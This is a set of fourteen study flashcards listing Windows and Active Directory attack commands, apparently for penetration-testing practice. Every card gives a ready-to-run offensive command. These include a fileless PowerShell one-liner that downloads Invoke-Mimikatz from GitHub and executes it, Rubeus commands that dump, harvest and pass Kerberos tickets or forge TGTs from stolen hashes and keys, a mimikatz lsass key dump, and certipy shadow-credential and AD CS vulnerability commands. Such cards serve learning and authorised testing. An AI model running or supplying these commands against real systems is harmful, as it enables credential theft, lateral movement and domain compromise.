Windows Hacking Commands Flashcards
(14 cards)
Mimikatz fileless download powershell
(New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1’) | IEX
How to dump kerberos tickets from memory?
Rubeus.exe dump
How to dump only TGTs from memory?
Rubeus.exe dump /tgt
How to use a ticket (pass the ticket)?
Rubeus.exe ptt /ticket:”C:\path\to\ticket.kirbi”
How to make a kerberos ticket from an NTLM hash?
Rubeus.exe asktgt /domain:[domain] /user:[user] /rc4:[hash] /ptt
How to create a fake logon session with rubeus?
Rubeus.exe createnetonly /program:”C:\Windows\System32\cmd.exe” /show
How to make a TGT with a key?
Rubeus.exe asktgt /domain:[domain] /user:[user] /aes256:[AES_KEY] /ptt
How to dump kerberos keys from lsass?
mimikatz.exe privilege::debug sekurlsa::ekeys exit
How to extract kerberos tickets from active users on a windows host?
Rubeus.exe harvest /interval:30 /nowrap
Get groups of user AD
ldapsearch -x -H ldap://[ip] -D [authuser]@[domain] -w [authpass] -b DC=[domain],DC=[domain] ‘(sAMAccountName=[user])’ memberOf
Whats the syntax of ldapsearch
ldapsearch, auth_method, ldap_url, auth_user, auth_pass, base, filter, attribute
how to add a user to a group AD
net rpc group addmem [group] [user] -U [domain]/[user]%[password] -S [dc]
Add shadow creds to user AD
certipy shadow auto -username [user]@[domain] -p [pass] -account [target_user] -dc-ip [dc]
Enumerate CA vulnerabilities (ESC)
certipy find -vulnerable -u [user]@[domain] -hashes [NT_hash] -dc-ip [dc]